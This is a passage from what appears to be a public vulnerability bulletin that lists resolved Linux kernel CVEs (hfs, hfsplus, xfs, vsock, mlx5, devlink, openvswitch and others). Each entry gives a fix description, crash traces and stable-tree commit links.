entry_SYSCALL_64_after_hwframe+0x77/0x7f CPU: 1 UID: 0 PID: 12609 Comm: syz.1.2692 Not tainted 6.16.0-syzkaller #0 PREEMPT(none) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025 ===================================================== The HFS_SB(sb)->bitmap buffer is allocated in hfs_mdb_get(): HFS_SB(sb)->bitmap = kmalloc(8192, GFP_KERNEL); Finally, it can trigger the reported issue because kmalloc() doesn't clear the allocated memory. If allocated memory contains only zeros, then everything will work pretty fine. But if the allocated memory contains the "garbage", then it can affect the bitmap operations and it triggers the reported issue. This patch simply exchanges the kmalloc() on kzalloc() with the goal to guarantee the correctness of bitmap operations. Because, newly created allocation bitmap should have all available blocks free. Potentially, initialization bitmap's read operation could not fill the whole allocated memory and "garbage" in the not initialized memory will be the reason of volume coruptions and file system driver bugs. | 2025-12-04 | not yet calculated | CVE-2025-40243 | https://git.kernel.org/stable/c/fc56548fca732f3d3692c83b40db796259a03887 https://git.kernel.org/stable/c/bf1683078fbdd09a7f7f9b74121ebaa03432bd00 https://git.kernel.org/stable/c/2a112cdd66f5a132da5235ca31a320528c86bf33 https://git.kernel.org/stable/c/e148ed5cda8fd96d4620c4622fb02f552a2d166a https://git.kernel.org/stable/c/cfafefcb0e1fc60135f7040f4aed0a4aef4f76ca https://git.kernel.org/stable/c/3b447fd401824e1ccf0b769188edefe866a1e676 https://git.kernel.org/stable/c/502fa92a71f344611101bd04ef1a595b8b6014f5 https://git.kernel.org/stable/c/2048ec5b98dbdfe0b929d2e42dc7a54c389c53dd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent() The syzbot reported issue in __hfsplus_ext_cache_extent(): [ 70.194323][ T9350] BUG: KMSAN: uninit-value in __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.195022][ T9350] __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.195530][ T9350] hfsplus_file_extend+0x74f/0x1cf0 [ 70.195998][ T9350] hfsplus_get_block+0xe16/0x17b0 [ 70.196458][ T9350] __block_write_begin_int+0x962/0x2ce0 [ 70.196959][ T9350] cont_write_begin+0x1000/0x1950 [ 70.197416][ T9350] hfsplus_write_begin+0x85/0x130 [ 70.197873][ T9350] generic_perform_write+0x3e8/0x1060 [ 70.198374][ T9350] __generic_file_write_iter+0x215/0x460 [ 70.198892][ T9350] generic_file_write_iter+0x109/0x5e0 [ 70.199393][ T9350] vfs_write+0xb0f/0x14e0 [ 70.199771][ T9350] ksys_write+0x23e/0x490 [ 70.200149][ T9350] __x64_sys_write+0x97/0xf0 [ 70.200570][ T9350] x64_sys_call+0x3015/0x3cf0 [ 70.201065][ T9350] do_syscall_64+0xd9/0x1d0 [ 70.201506][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.202054][ T9350] [ 70.202279][ T9350] Uninit was created at: [ 70.202693][ T9350] __kmalloc_noprof+0x621/0xf80 [ 70.203149][ T9350] hfsplus_find_init+0x8d/0x1d0 [ 70.203602][ T9350] hfsplus_file_extend+0x6ca/0x1cf0 [ 70.204087][ T9350] hfsplus_get_block+0xe16/0x17b0 [ 70.204561][ T9350] __block_write_begin_int+0x962/0x2ce0 [ 70.205074][ T9350] cont_write_begin+0x1000/0x1950 [ 70.205547][ T9350] hfsplus_write_begin+0x85/0x130 [ 70.206017][ T9350] generic_perform_write+0x3e8/0x1060 [ 70.206519][ T9350] __generic_file_write_iter+0x215/0x460 [ 70.207042][ T9350] generic_file_write_iter+0x109/0x5e0 [ 70.207552][ T9350] vfs_write+0xb0f/0x14e0 [ 70.207961][ T9350] ksys_write+0x23e/0x490 [ 70.208375][ T9350] __x64_sys_write+0x97/0xf0 [ 70.208810][ T9350] x64_sys_call+0x3015/0x3cf0 [ 70.209255][ T9350] do_syscall_64+0xd9/0x1d0 [ 70.209680][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f [ 70.210230][ T9350] [ 70.210454][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Not tainted 6.12.0-rc5 #5 [ 70.211174][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.212115][ T9350] ===================================================== [ 70.212734][ T9350] Disabling lock debugging due to kernel taint [ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic set ... [ 70.213858][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Tainted: G B 6.12.0-rc5 #5 [ 70.214679][ T9350] Tainted: [B]=BAD_PAGE [ 70.215057][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 70.215999][ T9350] Call Trace: [ 70.216309][ T9350] <TASK> [ 70.216585][ T9350] dump_stack_lvl+0x1fd/0x2b0 [ 70.217025][ T9350] dump_stack+0x1e/0x30 [ 70.217421][ T9350] panic+0x502/0xca0 [ 70.217803][ T9350] ? kmsan_get_metadata+0x13e/0x1c0 [ 70.218294][ Message fromT sy9350] kmsan_report+0x296/slogd@syzkaller 0x2aat Aug 18 22:11:058 ... kernel :[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic [ 70.220179][ T9350] ? kmsan_get_metadata+0x13e/0x1c0 set ... [ 70.221254][ T9350] ? __msan_warning+0x96/0x120 [ 70.222066][ T9350] ? __hfsplus_ext_cache_extent+0x7d0/0x990 [ 70.223023][ T9350] ? hfsplus_file_extend+0x74f/0x1cf0 [ 70.224120][ T9350] ? hfsplus_get_block+0xe16/0x17b0 [ 70.224946][ T9350] ? __block_write_begin_int+0x962/0x2ce0 [ 70.225756][ T9350] ? cont_write_begin+0x1000/0x1950 [ 70.226337][ T9350] ? hfsplus_write_begin+0x85/0x130 [ 70.226852][ T9350] ? generic_perform_write+0x3e8/0x1060 [ 70.227405][ T9350] ? __generic_file_write_iter+0x215/0x460 [ 70.227979][ T9350] ? generic_file_write_iter+0x109/0x5e0 [ 70.228540][ T9350] ? vfs_write+0xb0f/0x14e0 [ 70.228997][ T9350] ? ksys_write+0x23e/0x490 ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40244 | https://git.kernel.org/stable/c/c1ec90bed504640a42bb20a5f413be39cd17ad71 https://git.kernel.org/stable/c/b8a72692aa42b7dcd179a96b90bc2763ac74576a https://git.kernel.org/stable/c/c135b8dca65526aa5b8814e9954e0ae317d9c598 https://git.kernel.org/stable/c/d7e313039a8f3a6ee072dc5ff4643234d2d735cf https://git.kernel.org/stable/c/a5bfb13b4f406aef1a450f99d22d3e48df01528c https://git.kernel.org/stable/c/99202d94909d323a30d154ab0261c0a07166daec https://git.kernel.org/stable/c/14c673a2f3ecf650b694a52a88688f1d71849899 https://git.kernel.org/stable/c/4840ceadef4290c56cc422f0fc697655f3cbf070 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nios2: ensure that memblock.current_limit is set when setting pfn limits On nios2, with CONFIG_FLATMEM set, the kernel relies on memblock_get_current_limit() to determine the limits of mem_map, in particular for max_low_pfn. Unfortunately, memblock.current_limit is only default initialized to MEMBLOCK_ALLOC_ANYWHERE at this point of the bootup, potentially leading to situations where max_low_pfn can erroneously exceed the value of max_pfn and, thus, the valid range of available DRAM. This can in turn cause kernel-level paging failures, e.g.: [ 76.900000] Unable to handle kernel paging request at virtual address 20303000 [ 76.900000] ea = c0080890, ra = c000462c, cause = 14 [ 76.900000] Kernel panic - not syncing: Oops [ 76.900000] ---[ end Kernel panic - not syncing: Oops ]--- This patch fixes this by pre-calculating memblock.current_limit based on the upper limits of the available memory ranges via adjust_lowmem_bounds, a simplified version of the equivalent implementation within the arm architecture. | 2025-12-04 | not yet calculated | CVE-2025-40245 | https://git.kernel.org/stable/c/25f09699edd360b534ccae16bc276c3b52c471f3 https://git.kernel.org/stable/c/5c3e38a367822f036227dd52bac82dc4a05157e2 https://git.kernel.org/stable/c/b1ec9faef7e36269ca3ec890972a78effbaeb975 https://git.kernel.org/stable/c/90f5f715550e07cd6a51f80fc3f062d832c8c997 https://git.kernel.org/stable/c/8912814f14e298b83df072fecc1f7ed1b63b1b2c https://git.kernel.org/stable/c/a20b83cf45be2057f3d073506779e52c7fa17f94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix out of bounds memory read error in symlink repair xfs/286 produced this report on my test fleet: ================================================================== BUG: KFENCE: out-of-bounds read in memcpy_orig+0x54/0x110 Out-of-bounds read at 0xffff88843fe9e038 (184B right of kfence-#184): memcpy_orig+0x54/0x110 xrep_symlink_salvage_inline+0xb3/0xf0 [xfs] xrep_symlink_salvage+0x100/0x110 [xfs] xrep_symlink+0x2e/0x80 [xfs] xrep_attempt+0x61/0x1f0 [xfs] xfs_scrub_metadata+0x34f/0x5c0 [xfs] xfs_ioc_scrubv_metadata+0x387/0x560 [xfs] xfs_file_ioctl+0xe23/0x10e0 [xfs] __x64_sys_ioctl+0x76/0xc0 do_syscall_64+0x4e/0x1e0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 kfence-#184: 0xffff88843fe9df80-0xffff88843fe9dfea, size=107, cache=kmalloc-128 allocated by task 3470 on cpu 1 at 263329.131592s (192823.508886s ago): xfs_init_local_fork+0x79/0xe0 [xfs] xfs_iformat_local+0xa4/0x170 [xfs] xfs_iformat_data_fork+0x148/0x180 [xfs] xfs_inode_from_disk+0x2cd/0x480 [xfs] xfs_iget+0x450/0xd60 [xfs] xfs_bulkstat_one_int+0x6b/0x510 [xfs] xfs_bulkstat_iwalk+0x1e/0x30 [xfs] xfs_iwalk_ag_recs+0xdf/0x150 [xfs] xfs_iwalk_run_callbacks+0xb9/0x190 [xfs] xfs_iwalk_ag+0x1dc/0x2f0 [xfs] xfs_iwalk_args.constprop.0+0x6a/0x120 [xfs] xfs_iwalk+0xa4/0xd0 [xfs] xfs_bulkstat+0xfa/0x170 [xfs] xfs_ioc_fsbulkstat.isra.0+0x13a/0x230 [xfs] xfs_file_ioctl+0xbf2/0x10e0 [xfs] __x64_sys_ioctl+0x76/0xc0 do_syscall_64+0x4e/0x1e0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 CPU: 1 UID: 0 PID: 1300113 Comm: xfs_scrub Not tainted 6.18.0-rc4-djwx #rc4 PREEMPT(lazy) 3d744dd94e92690f00a04398d2bd8631dcef1954 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-4.module+el8.8.0+21164+ed375313 04/01/2014 ================================================================== On further analysis, I realized that the second parameter to min() is not correct. xfs_ifork::if_bytes is the size of the xfs_ifork::if_data buffer. if_bytes can be smaller than the data fork size because: (a) the forkoff code tries to keep the data area as large as possible (b) for symbolic links, if_bytes is the ondisk file size + 1 (c) forkoff is always a multiple of 8. Case in point: for a single-byte symlink target, forkoff will be 8 but the buffer will only be 2 bytes long. In other words, the logic here is wrong and we walk off the end of the incore buffer. Fix that. | 2025-12-04 | not yet calculated | CVE-2025-40246 | https://git.kernel.org/stable/c/7c2d68e091584149fe89bcbaf9b99b3162d46ee7 https://git.kernel.org/stable/c/81a8685cac4bf081c93a7df591644f4f80240bb9 https://git.kernel.org/stable/c/678e1cc2f482e0985a0613ab4a5bf89c497e5acc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: Fix pgtable prealloc error path The following splat was reported: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=00000008d0fd8000 [0000000000000010] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP CPU: 5 UID: 1000 PID: 149076 Comm: Xwayland Tainted: G S 6.16.0-rc2-00809-g0b6974bb4134-dirty #367 PREEMPT Tainted: [S]=CPU_OUT_OF_SPEC Hardware name: Qualcomm Technologies, Inc. SM8650 HDK (DT) pstate: 83400005 (Nzcv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--) pc : build_detached_freelist+0x28/0x224 lr : kmem_cache_free_bulk.part.0+0x38/0x244 sp : ffff000a508c7a20 x29: ffff000a508c7a20 x28: ffff000a508c7d50 x27: ffffc4e49d16f350 x26: 0000000000000058 x25: 00000000fffffffc x24: 0000000000000000 x23: ffff00098c4e1450 x22: 00000000fffffffc x21: 0000000000000000 x20: ffff000a508c7af8 x19: 0000000000000002 x18: 00000000000003e8 x17: ffff000809523850 x16: ffff000809523820 x15: 0000000000401640 x14: ffff000809371140 x13: 0000000000000130 x12: ffff0008b5711e30 x11: 00000000001058fa x10: 0000000000000a80 x9 : ffff000a508c7940 x8 : ffff000809371ba0 x7 : 781fffe033087fff x6 : 0000000000000000 x5 : ffff0008003cd000 x4 : 781fffe033083fff x3 : ffff000a508c7af8 x2 : fffffdffc0000000 x1 : 0001000000000000 x0 : ffff0008001a6a00 Call trace: build_detached_freelist+0x28/0x224 (P) kmem_cache_free_bulk.part.0+0x38/0x244 kmem_cache_free_bulk+0x10/0x1c msm_iommu_pagetable_prealloc_cleanup+0x3c/0xd0 msm_vma_job_free+0x30/0x240 msm_ioctl_vm_bind+0x1d0/0x9a0 drm_ioctl_kernel+0x84/0x104 drm_ioctl+0x358/0x4d4 __arm64_sys_ioctl+0x8c/0xe0 invoke_syscall+0x44/0x100 el0_svc_common.constprop.0+0x3c/0xe0 do_el0_svc+0x18/0x20 el0_svc+0x30/0x100 el0t_64_sync_handler+0x104/0x130 el0t_64_sync+0x170/0x174 Code: aa0203f5 b26287e2 f2dfbfe2 aa0303f4 (f8737ab6) ---[ end trace 0000000000000000 ]--- Since msm_vma_job_free() is called directly from the ioctl, this looks like an error path cleanup issue. Which I think results from prealloc_cleanup() called without a preceding successful prealloc_allocate() call. So handle that case better. Patchwork: https://patchwork.freedesktop.org/patch/678677/ | 2025-12-04 | not yet calculated | CVE-2025-40247 | https://git.kernel.org/stable/c/b865da18b6cb878f33b5920693d03f23b9c4d1a3 https://git.kernel.org/stable/c/830d68f2cb8ab6fb798bb9555016709a9e012af0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: Ignore signal/timeout on connect() if already established During connect(), acting on a signal/timeout by disconnecting an already established socket leads to several issues: 1. connect() invoking vsock_transport_cancel_pkt() -> virtio_transport_purge_skbs() may race with sendmsg() invoking virtio_transport_get_credit(). This results in a permanently elevated `vvs->bytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling. 2. connect() resetting a connected socket's state may race with socket being placed in a sockmap. A disconnected socket remaining in a sockmap breaks sockmap's assumptions. And gives rise to WARNs. 3. connect() transitioning SS_CONNECTED -> SS_UNCONNECTED allows for a transport change/drop after TCP_ESTABLISHED. Which poses a problem for any simultaneous sendmsg() or connect() and may result in a use-after-free/null-ptr-deref. Do not disconnect socket on signal/timeout. Keep the logic for unconnected sockets: they don't linger, can't be placed in a sockmap, are rejected by sendmsg(). [1]: https://lore.kernel.org/netdev/e07fd95c-9a38-4eea-9638-133e38c2ec9b@rbox.co/ [2]: https://lore.kernel.org/netdev/20250317-vsock-trans-signal-race-v4-0-fc8837f3f1d4@rbox.co/ [3]: https://lore.kernel.org/netdev/60f1b7db-3099-4f6a-875e-af9f6ef194f6@rbox.co/ | 2025-12-04 | not yet calculated | CVE-2025-40248 | https://git.kernel.org/stable/c/3f71753935d648082a8279a97d30efe6b85be680 https://git.kernel.org/stable/c/da664101fb4a0de5cb70d2bae6a650df954df2af https://git.kernel.org/stable/c/67432915145848658149683101104e32f9fd6559 https://git.kernel.org/stable/c/eeca93f06df89be5a36305b7b9dae1ed65550dfc https://git.kernel.org/stable/c/5998da5a8208ae9ad7838ba322bccb2bdcd95e81 https://git.kernel.org/stable/c/f1c170cae285e4b8f61be043bb17addc3d0a14b5 https://git.kernel.org/stable/c/ab6b19f690d89ae4709fba73a3c4a7911f495b7a https://git.kernel.org/stable/c/002541ef650b742a198e4be363881439bb9d86b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: cdev: make sure the cdev fd is still active before emitting events With the final call to fput() on a file descriptor, the release action may be deferred and scheduled on a work queue. The reference count of that descriptor is still zero and it must not be used. It's possible that a GPIO change, we want to notify the user-space about, happens AFTER the reference count on the file descriptor associated with the character device went down to zero but BEFORE the .release() callback was called from the workqueue and so BEFORE we unregistered from the notifier. Using the regular get_file() routine in this situation triggers the following warning: struct file::f_count incremented from zero; use-after-free condition present! So use the get_file_active() variant that will return NULL on file descriptors that have been or are being released. | 2025-12-04 | not yet calculated | CVE-2025-40249 | https://git.kernel.org/stable/c/dccc6daa8afa0f64c432e4c867f275747e3415e1 https://git.kernel.org/stable/c/d4cd0902c156b2ca60fdda8cd8b5bcb4b0e9ed64 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Clean up only new IRQ glue on request_irq() failure The mlx5_irq_alloc() function can inadvertently free the entire rmap and end up in a crash[1] when the other threads tries to access this, when request_irq() fails due to exhausted IRQ vectors. This commit modifies the cleanup to remove only the specific IRQ mapping that was just added. This prevents removal of other valid mappings and ensures precise cleanup of the failed IRQ allocation's associated glue object. Note: This error is observed when both fwctl and rds configs are enabled. [1] mlx5_core 0000:05:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:05:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:06:00.0: Successfully registered panic handler for port 1 mlx5_core 0000:06:00.0: mlx5_irq_alloc:293:(pid 66740): Failed to request irq. err = -28 infiniband mlx5_0: mlx5_ib_test_wc:290:(pid 66740): Error -28 while trying to test write-combining support mlx5_core 0000:06:00.0: Successfully unregistered panic handler for port 1 mlx5_core 0000:03:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 mlx5_core 0000:05:00.0: mlx5_irq_alloc:293:(pid 28895): Failed to request irq. err = -28 general protection fault, probably for non-canonical address 0xe277a58fde16f291: 0000 [#1] SMP NOPTI RIP: 0010:free_irq_cpu_rmap+0x23/0x7d Call Trace: <TASK> ? show_trace_log_lvl+0x1d6/0x2f9 ? show_trace_log_lvl+0x1d6/0x2f9 ? mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] ? __die_body.cold+0x8/0xa ? die_addr+0x39/0x53 ? exc_general_protection+0x1c4/0x3e9 ? dev_vprintk_emit+0x5f/0x90 ? asm_exc_general_protection+0x22/0x27 ? free_irq_cpu_rmap+0x23/0x7d mlx5_irq_alloc.cold+0x5d/0xf3 [mlx5_core] irq_pool_request_vector+0x7d/0x90 [mlx5_core] mlx5_irq_request+0x2e/0xe0 [mlx5_core] mlx5_irq_request_vector+0xad/0xf7 [mlx5_core] comp_irq_request_pci+0x64/0xf0 [mlx5_core] create_comp_eq+0x71/0x385 [mlx5_core] ? mlx5e_open_xdpsq+0x11c/0x230 [mlx5_core] mlx5_comp_eqn_get+0x72/0x90 [mlx5_core] ? xas_load+0x8/0x91 mlx5_comp_irqn_get+0x40/0x90 [mlx5_core] mlx5e_open_channel+0x7d/0x3c7 [mlx5_core] mlx5e_open_channels+0xad/0x250 [mlx5_core] mlx5e_open_locked+0x3e/0x110 [mlx5_core] mlx5e_open+0x23/0x70 [mlx5_core] __dev_open+0xf1/0x1a5 __dev_change_flags+0x1e1/0x249 dev_change_flags+0x21/0x5c do_setlink+0x28b/0xcc4 ? __nla_parse+0x22/0x3d ? inet6_validate_link_af+0x6b/0x108 ? cpumask_next+0x1f/0x35 ? __snmp6_fill_stats64.constprop.0+0x66/0x107 ? __nla_validate_parse+0x48/0x1e6 __rtnl_newlink+0x5ff/0xa57 ? kmem_cache_alloc_trace+0x164/0x2ce rtnl_newlink+0x44/0x6e rtnetlink_rcv_msg+0x2bb/0x362 ? __netlink_sendskb+0x4c/0x6c ? netlink_unicast+0x28f/0x2ce ? rtnl_calcit.isra.0+0x150/0x146 netlink_rcv_skb+0x5f/0x112 netlink_unicast+0x213/0x2ce netlink_sendmsg+0x24f/0x4d9 __sock_sendmsg+0x65/0x6a ____sys_sendmsg+0x28f/0x2c9 ? import_iovec+0x17/0x2b ___sys_sendmsg+0x97/0xe0 __sys_sendmsg+0x81/0xd8 do_syscall_64+0x35/0x87 entry_SYSCALL_64_after_hwframe+0x6e/0x0 RIP: 0033:0x7fc328603727 Code: c3 66 90 41 54 41 89 d4 55 48 89 f5 53 89 fb 48 83 ec 10 e8 0b ed ff ff 44 89 e2 48 89 ee 89 df 41 89 c0 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 35 44 89 c7 48 89 44 24 08 e8 44 ed ff ff 48 RSP: 002b:00007ffe8eb3f1a0 EFLAGS: 00000293 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007fc328603727 RDX: 0000000000000000 RSI: 00007ffe8eb3f1f0 RDI: 000000000000000d RBP: 00007ffe8eb3f1f0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000 R13: 00000000000 ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40250 | https://git.kernel.org/stable/c/69e043bce09c9a77e5f55b9ac7505874a2a1a9f0 https://git.kernel.org/stable/c/6ebd02cf2dde11b86f89ea4c9f55179eab30d4ee https://git.kernel.org/stable/c/4d6b4bea8b80bfa13c903ba547538249e7c5e977 https://git.kernel.org/stable/c/d47515af6cccd7484d8b0870376858c9848a18ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: rate: Unset parent pointer in devl_rate_nodes_destroy The function devl_rate_nodes_destroy is documented to "Unset parent for all rate objects". However, it was only calling the driver-specific `rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing the parent's refcount, without actually setting the `devlink_rate->parent` pointer to NULL. This leaves a dangling pointer in the `devlink_rate` struct, which cause refcount error in netdevsim[1] and mlx5[2]. In addition, this is inconsistent with the behavior of `devlink_nl_rate_parent_node_set`, where the parent pointer is correctly cleared. This patch fixes the issue by explicitly setting `devlink_rate->parent` to NULL after notifying the driver, thus fulfilling the function's documented behavior for all rate objects. [1] repro steps: echo 1 > /sys/bus/netdevsim/new_device devlink dev eswitch set netdevsim/netdevsim1 mode switchdev echo 1 > /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs devlink port function rate add netdevsim/netdevsim1/test_node devlink port function rate set netdevsim/netdevsim1/128 parent test_node echo 1 > /sys/bus/netdevsim/del_device dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: <TASK> devl_rate_leaf_destroy+0x8d/0x90 __nsim_dev_port_del+0x6c/0x70 [netdevsim] nsim_dev_reload_destroy+0x11c/0x140 [netdevsim] nsim_drv_remove+0x2b/0xb0 [netdevsim] device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 device_unregister+0x1a/0x60 del_device_store+0x111/0x170 [netdevsim] kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x55/0x10f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [2] devlink dev eswitch set pci/0000:08:00.0 mode switchdev devlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000 devlink port function rate add pci/0000:08:00.0/group1 devlink port function rate set pci/0000:08:00.0/32768 parent group1 modprobe -r mlx5_ib mlx5_fwctl mlx5_core dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: <TASK> devl_rate_leaf_destroy+0x8d/0x90 mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core] mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core] mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core] mlx5_sf_esw_event+0xc4/0x120 [mlx5_core] notifier_call_chain+0x33/0xa0 blocking_notifier_call_chain+0x3b/0x50 mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core] mlx5_eswitch_disable+0x63/0x90 [mlx5_core] mlx5_unload+0x1d/0x170 [mlx5_core] mlx5_uninit_one+0xa2/0x130 [mlx5_core] remove_one+0x78/0xd0 [mlx5_core] pci_device_remove+0x39/0xa0 device_release_driver_internal+0x194/0x1f0 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x53/0x1f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 | 2025-12-04 | not yet calculated | CVE-2025-40251 | https://git.kernel.org/stable/c/715d9cda646a8a38ea8b2bb5afb679a7464055e2 https://git.kernel.org/stable/c/c70df6c17d389cc743f0eb30160e2d6bc6910db8 https://git.kernel.org/stable/c/542f45486f1ce2d2dde75bd85aca0389ef7046c3 https://git.kernel.org/stable/c/f94c1a114ac209977bdf5ca841b98424295ab1f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() The loops in 'qede_tpa_cont()' and 'qede_tpa_end()', iterate over 'cqe->len_list[]' using only a zero-length terminator as the stopping condition. If the terminator was missing or malformed, the loop could run past the end of the fixed-size array. Add an explicit bound check using ARRAY_SIZE() in both loops to prevent a potential out-of-bounds access. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-04 | not yet calculated | CVE-2025-40252 | https://git.kernel.org/stable/c/ecbb12caf399d7cf364b7553ed5aebeaa2f255bc https://git.kernel.org/stable/c/a778912b4a53587ea07d85526d152f85d109cbfe https://git.kernel.org/stable/c/f0923011c1261b33a2ac1de349256d39cb750dd0 https://git.kernel.org/stable/c/917a9d02182ac8b4f25eb47dc02f3ec679608c24 https://git.kernel.org/stable/c/e441db07f208184e0466abf44b389a81d70c340e https://git.kernel.org/stable/c/896f1a2493b59beb2b5ccdf990503dbb16cb2256 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/ctcm: Fix double-kfree The function 'mpc_rcvd_sweep_req(mpcginfo)' is called conditionally from function 'ctcmpc_unpack_skb'. It frees passed mpcginfo. After that a call to function 'kfree' in function 'ctcmpc_unpack_skb' frees it again. Remove 'kfree' call in function 'mpc_rcvd_sweep_req(mpcginfo)'. Bug detected by the clang static analyzer. | 2025-12-04 | not yet calculated | CVE-2025-40253 | https://git.kernel.org/stable/c/06f1dd1de0d33dbfbd2e1fc9fc57d8895f730de2 https://git.kernel.org/stable/c/6bf8ccaabce8cebb6cb1f255c93d0acdfe95c17a https://git.kernel.org/stable/c/7616e2eee679746d526c7f5befd4eedb995935b5 https://git.kernel.org/stable/c/43096dab8cc60fc39133205fd149a54d3acebea8 https://git.kernel.org/stable/c/3b177b2ded563df16f6d5920671ffcfe5915d472 https://git.kernel.org/stable/c/b9dbfb1b5699f9f1e4991f96741bdf9047147589 https://git.kernel.org/stable/c/7ff76f8dc6b550f8d16487bf3cebc278be720b5c https://git.kernel.org/stable/c/da02a1824884d6c84c5e5b5ac373b0c9e3288ec2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: remove never-working support for setting nsh fields The validation of the set(nsh(...)) action is completely wrong. It runs through the nsh_key_put_from_nlattr() function that is the same function that validates NSH keys for the flow match and the push_nsh() action. However, the set(nsh(...)) has a very different memory layout. Nested attributes in there are doubled in size in case of the masked set(). That makes proper validation impossible. There is also confusion in the code between the 'masked' flag, that says that the nested attributes are doubled in size containing both the value and the mask, and the 'is_mask' that says that the value we're parsing is the mask. This is causing kernel crash on trying to write into mask part of the match with SW_FLOW_KEY_PUT() during validation, while validate_nsh() doesn't allocate any memory for it: BUG: kernel NULL pointer dereference, address: 0000000000000018 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary) RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch] Call Trace: <TASK> validate_nsh+0x60/0x90 [openvswitch] validate_set.constprop.0+0x270/0x3c0 [openvswitch] __ovs_nla_copy_actions+0x477/0x860 [openvswitch] ovs_nla_copy_actions+0x8d/0x100 [openvswitch] ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch] genl_family_rcv_msg_doit+0xdb/0x130 